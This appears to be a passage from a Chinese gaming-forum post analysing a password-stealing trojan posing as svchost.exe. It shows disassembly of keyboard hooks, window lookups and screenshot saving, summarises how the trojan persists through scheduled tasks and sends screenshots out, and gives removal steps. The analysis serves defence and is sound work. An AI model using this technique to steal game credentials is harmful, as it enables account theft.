  228. 0040369B   >  68 78364000   push svchost.00403678                    ;  user32
  229. 004036A0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  230. 004036A5   .  FFD0          call eax
  231. 004036A7   .  FFE0          jmp eax                                  ;  MapVirtualKeyA

  232. 7340CEF2 |. 56 push esi ; /lParam
  233. 7340CEF3 |. FF75 0C push [arg.2] ; |wParam
  234. 7340CEF6 |. FF75 08 push [arg.1] ; |HookCode
  235. 7340CEF9 |. FFB0 6C020000 push dword ptr ds:[eax+26C] ; |hHook
  236. 7340CEFF |. FF15 C8143973 call dword ptr ds:[<&USER32.CallNex>; \CallNextHookEx

  237. 004033B0   [        DISCUZ_CODE_4        ]nbsp; A1 80574100   mov eax,dword ptr ds:[415780]
  238. 004033B5   .  0BC0          or eax,eax
  239. 004033B7   .  74 02         je short svchost.004033BB
  240. 004033B9   .  FFE0          jmp eax
  241. 004033BB   >  68 98334000   push svchost.00403398                    ;  user32
  242. 004033C0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  243. 004033C5   .  FFD0          call eax
  244. 004033C7   .  FFE0          jmp eax                                  ;  GetDC


  245. 733A1BAF . 57 push edi ; /hDC => NULL
  246. 733A1BB0 . FF15 D0163973 call dword ptr ds:[<&GDI32.CreateCompati>; \CreateCompatibleDC
  247. 733A1BB6 . 3BC7 cmp eax,edi
  248. 733A1BB8 . 8986 640E0000 mov dword ptr ds:[esi+E64],eax
  249. 733A1BBE . 0F84 6F590200 je msvbvm60.733C7533
  250. 733A1BC4 . 6A 07 push 7 ; /ObjectType = OBJ_BITMAP
  251. 733A1BC6 . 50 push eax ; |hDC
  252. 733A1BC7 . FF15 50173973 call dword ptr ds:[<&GDI32.GetCurrentObj>; \GetCurrentObject

  253. 004059AB   > \68 88594000   push svchost.00405988                    ;  GDIPlus
  254. 004059B0   .  B8 201B4000   mov eax,<jmp.&msvbvm60.DllFunctionCall>
  255. 004059B5   .  FFD0          call eax
  256. 004059B7   .  FFE0          jmp eax                                  ;  GdipSaveImageToFile


  257. 0040D51A . 68 704E4000 push svchost.00404E70 ; /\Pusmint\jietu.jpg
  258. 0040D51F . FF15 48F04100 call dword ptr ds:[<&msvbvm60.__vbaStrCa>; \__vbaStrCat
  259. 0040D525 . 8945 A0 mov dword ptr ss:[ebp-60],eax
  260. 0040D528 . C745 98 08000>mov dword ptr ss:[ebp-68],8
  261. 0040D52F . 6A 00 push 0
  262. 0040D531 . 8D55 98 lea edx,dword ptr ss:[ebp-68]
  263. 0040D534 . 52 push edx


  264. 00411B52 . 68 305C4000 push svchost.00405C30 ; Write
  265. 00411B57 . 894A 04 mov dword ptr ds:[edx+4],ecx
  266. 00411B5A . 8B4D D4 mov ecx,dword ptr ss:[ebp-2C]
  267. 00411B5D . 53 push ebx
  268. 00411B5E . 68 1C5C4000 push svchost.00405C1C ; Document
  269. 00411B63 . 8942 08 mov dword ptr ds:[edx+8],eax
  270. 00411B66 . 8B45 90 mov eax,dword ptr ss:[ebp-70]
  271. 00411B69 . 51 push ecx
  272. 00411B6A . 8942 0C mov dword ptr ds:[edx+C],eax
  273. 00411B6D . 8D55 B4 lea edx,dword ptr ss:[ebp-4C]
  274. 00411B70 . 52 push edx
  275. 00411B71 . FFD7 call edi
  276. 00411B73 . 83C4 10 add esp,10
  277. 00411B76 . 50 push eax
  278. 00411B77 . FF15 D0F04100 call dword ptr ds:[<&msvbvm60.__vbaObj>; msvbvm60.__vbaObjVar
  279. 00411B7D . 50 push eax
  280. 00411B7E . FF15 CCF14100 call dword ptr ds:[<&msvbvm60.__vbaLat>; msvbvm60.__vbaLateMemCall
  281. 00411B84 . 83C4 1C add esp,1C
  282. 00411B87 . 8D4D B4 lea ecx,dword ptr ss:[ebp-4C]
  283. 00411B8A . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  284. 00411B90 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  285. 00411B93 . 53 push ebx
  286. 00411B94 . 68 3C5C4000 push svchost.00405C3C ; hwnd
  287. 00411B99 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  288. 00411B9C . 50 push eax
  289. 00411B9D . 51 push ecx
  290. 00411B9E . FFD7 call edi
  291. 00411BA0 . 83C4 10 add esp,10
  292. 00411BA3 . 8D55 C4 lea edx,dword ptr ss:[ebp-3C]
  293. 00411BA6 . 68 4C5C4000 push svchost.00405C4C ; Internet Explorer_Server
  294. 00411BAB . 52 push edx
  295. 00411BAC . FF15 C0F14100 call dword ptr ds:[<&msvbvm60.__vbaI4V>; msvbvm60.__vbaI4Var
  296. 00411BB2 . 50 push eax
  297. 00411BB3 . E8 E8030000 call svchost.00411FA0
  298. 00411BB8 . 8D4D C4 lea ecx,dword ptr ss:[ebp-3C]
  299. 00411BBB . 8945 E8 mov dword ptr ss:[ebp-18],eax
  300. 00411BBE . FF15 10F04100 call dword ptr ds:[<&msvbvm60.__vbaFre>; msvbvm60.__vbaFreeVar
  301. 00411BC4 . 8B45 D4 mov eax,dword ptr ss:[ebp-2C]
  302. 00411BC7 . 53 push ebx
  303. 00411BC8 . 68 9C5C4000 push svchost.00405C9C ; focus
  304. 00411BCD . 53 push ebx
  305. 00411BCE . 68 885C4000 push svchost.00405C88 ; fileField
  306. 00411BD3 . 53 push ebx
  307. 00411BD4 . 68 805C4000 push svchost.00405C80 ; All
  308. 00411BD9 . 53 push ebx
  309. 00411BDA . 68 1C5C4000 push svchost.00405C1C ; Document
複製代碼
總結:
1.獲取制定目錄創建目錄,自複制,然後運行。

2.創建bat實現計劃任務指定時間運行木馬。

3.結束自身。

4.複製後的程序通過查找窗口,枚舉進程方法獲取遊戲窗口截取密碼。

5.至於密保就是利用截屏,然後發送到製定地址。

由於本人能力的有限,錯誤及遺漏在所難免! 或許原理並沒有這麼簡單,還請其他高手作出指點. 萬分感謝!


查殺方法:

首先用XueTr.exe 結束svchost.exe結束進程(不結束怎麼刪除哈),然後

到這個目錄刪除C:\WINDOWS\system32\Pusmint下所有的文件。

然後運行XueTr.exe切換到啟動項就明朗了,直接delete *.JOB的項目。







大家正在看啥


收藏收藏 分享文章到FB上分享
回覆 使用道具 檢舉
複製專屬你的推廣連結:發至FB與各論壇宣傳:累積點數換GP商品 & 藍鑽
每五點閱率就可以兌換藍鑽積分或遊戲點卡 夢遊推廣文章換GP商品

你需要登入後才可以回覆 登入 | 加入會員

本版積分規則

Copyright (C) 2010-2020 夢遊電玩論壇

廣告合作:請直接聯繫我們,並附上您預刊登位置的預算。  

快速回覆 返回頂端 返回清單